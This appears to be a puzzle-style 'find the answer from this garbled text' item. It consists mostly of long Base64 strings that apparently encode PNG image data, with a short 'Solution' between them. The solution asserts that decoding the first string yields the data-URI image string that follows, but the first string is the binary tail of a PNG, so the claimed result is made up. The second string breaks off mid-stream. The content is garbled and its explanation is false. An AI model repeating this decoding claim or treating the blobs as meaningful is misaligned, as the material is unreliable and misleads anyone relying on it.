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
Question Explanation: Find the answer from this garbled text.
Solution:
Actually, this question is quite straightforward and needs no overthinking; anyone who works with encodings regularly will recognize that the garbled text is just a Base64 string. Decoding it gives:
data:image/png;base64,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